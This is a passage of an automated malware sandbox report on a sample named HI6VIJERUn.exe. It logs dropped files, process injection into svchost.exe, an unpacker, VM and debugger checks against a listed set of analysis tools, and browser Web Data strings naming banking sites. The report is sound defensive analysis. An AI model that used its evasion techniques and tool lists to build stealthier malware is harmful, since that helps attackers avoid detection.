                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wudfplatform.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: HI6VIJERUn.exeStatic file information: File size 1374325 > 1048576
                      Source: HI6VIJERUn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: kernel32.pdbUGP source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdbUGP source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: Hop.com, 0000000E.00000003.1668539645.0000024368810000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1668374308.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675250294.000001C2784D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1674864872.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: Hop.com, 0000000E.00000003.1669311626.00000243686E0000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669190239.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675738205.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675827080.000001C2783A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000023.00000003.2116953373.0000021AB3300000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2116916350.0000021AB32A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: kernelbase.pdb source: Hop.com, 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 15.2.svchost.exe.1c27633a300.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 15.2.svchost.exe.1c27633a300.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 15.2.svchost.exe.1c276308380.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 15.2.svchost.exe.1c276308380.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                      Source: HI6VIJERUn.exeStatic PE information: real checksum: 0x15799c should be: 0x154382
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 10_3_00000183202EF679 pushfd ; retf 10_3_00000183202EFF8A
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4676AD push rdi; ret 12_2_00007FF68C4676B4
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C467149 push rdi; ret 12_2_00007FF68C467152
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_3_0000024366312924 push rsp; ret 14_3_0000024366312925
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665ED0E0 pushad ; retf 14_2_00000243665ED0E1
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E3CC4 push E8000098h; ret 14_2_00000243665E3CC9
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F6B2D push ss; iretd 14_2_00000243668EB197
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665FA558 push ds; retf 14_2_00000243665FA56F
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F7BFE push esi; ret 14_2_00000243665F7BFF
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665FD61F push ebp; iretd 14_2_00000243665FD620
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665FDAC3 pushad ; iretd 14_2_0000024366924EAB
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F94BE push esi; ret 14_2_00000243665F94C2
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F76D1 push ecx; ret 14_2_00000243665F76F8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F5E68 push ebp; retf 14_2_00000243665F5E8C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665F5E8D push ebp; retf 14_2_00000243665F5E8C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783122DA push rsp; retf 15_3_000001C2783122DB
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2783283CD push rbp; retf 15_3_000001C2783283CE
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C278327E99 push rax; iretd 15_3_000001C278327E9A
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760708B2 push cs; ret 15_3_000001C276070953
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760708F4 push cs; ret 15_3_000001C276070953
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760755CE push eax; retf 15_3_000001C2760755D1
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760753CE push esi; ret 15_3_000001C2760753D5
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760751EE push edi; ret 15_3_000001C2760751F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C2760752E0 pushad ; iretd 15_3_000001C2760752E6
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640D0E0 pushad ; retf 15_2_000001C27640D0E1
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276403CC4 push E8000098h; ret 15_2_000001C276403CC9
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641A7F0 push edx; retf 15_2_000001C27641A7F4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641ADA2 pushad ; iretd 15_2_000001C27641ADA3
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641A5B3 push ebp; iretd 15_2_000001C27641A5B4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276419473 pushad ; ret 15_2_000001C27641947D
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276416572 push esp; retf 15_2_000001C2764165D9

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\407310\Hop.comJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\407310\Hop.comJump to dropped file
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Users\user\AppData\Local\Temp\BufferJump to dropped file
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Users\user\AppData\Local\Temp\BufferJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C454364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00007FF68C454364
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)
                      Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_15-3430
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                      Source: Hop.com, 0000000E.00000003.1670942879.000002436638F000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                      Source: Hop.com, 0000000E.00000003.1670942879.000002436638F000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDR#8
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDN
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HACKER.EXEFILEMON.EXEREGMON.EXEWIND
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831F5A0 rdtscp15_3_000001C27831F5A0
                      Source: C:\Windows\System32\dllhost.exeCode function: GetAdaptersInfo,36_2_000001F269C72B70
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-3862
                      Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_15-3448
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C472DE0 FindFirstFileExW,12_2_00007FF68C472DE0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4ACE3C GetFileAttributesW,FindFirstFileW,FindClose,12_2_00007FF68C4ACE3C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB0B80 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,15_3_00007DF426AB0B80
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 14_2_00000243665E5BC8 GetLogicalDriveStringsW,QueryDosDeviceW,14_2_00000243665E5BC8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C435C44 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,12_2_00007FF68C435C44
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\407310\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\407310Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: Web Data.25.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: tasks.office.comVMware20,11696503903o
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                      Source: svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
                      Source: svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
                      Source: Web Data.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                      Source: Web Data.25.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                      Source: Web Data.25.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                      Source: Web Data.25.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                      Source: Web Data.25.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                      Source: svchost.exe, 0000000F.00000002.2231588431.000001C27625D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2231621187.000001C276274000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2691355838.0000021AB318B000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000024.00000002.2691736483.000001F269D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wmplayer.exe, 00000023.00000002.2691355838.0000021AB318B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                      Source: Web Data.25.drBinary or memory string: global block list test formVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                      Source: Web Data.25.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                      Source: Web Data.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: AMC password management pageVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                      Source: dllhost.exe, 00000024.00000002.2691736483.000001F269D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: Web Data.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                      Source: chrome.exe, 00000013.00000002.1869550958.0000023A36EDF000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1896863064.000001E250044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 0000000F.00000002.2231464377.000001C276243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@~(v
                      Source: Web Data.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                      Source: Web Data.25.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                      Source: Web Data.25.drBinary or memory string: outlook.office.comVMware20,11696503903s
                      Source: Web Data.25.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                      Source: svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: Web Data.25.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                      Source: Web Data.25.drBinary or memory string: dev.azure.comVMware20,11696503903j
                      Source: Web Data.25.drBinary or memory string: discord.comVMware20,11696503903f
                      Source: Web Data.25.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831F5A0 rdtscp15_3_000001C27831F5A0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C455A40 GetLastError,IsDebuggerPresent,OutputDebugStringW,12_2_00007FF68C455A40
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C455A40 GetLastError,IsDebuggerPresent,OutputDebugStringW,12_2_00007FF68C455A40
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4741A8 GetProcessHeap,12_2_00007FF68C4741A8
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C478E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF68C478E74
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46AD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF68C46AD08
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF68C45566C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C455850 SetUnhandledExceptionFilter,12_2_00007FF68C455850

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
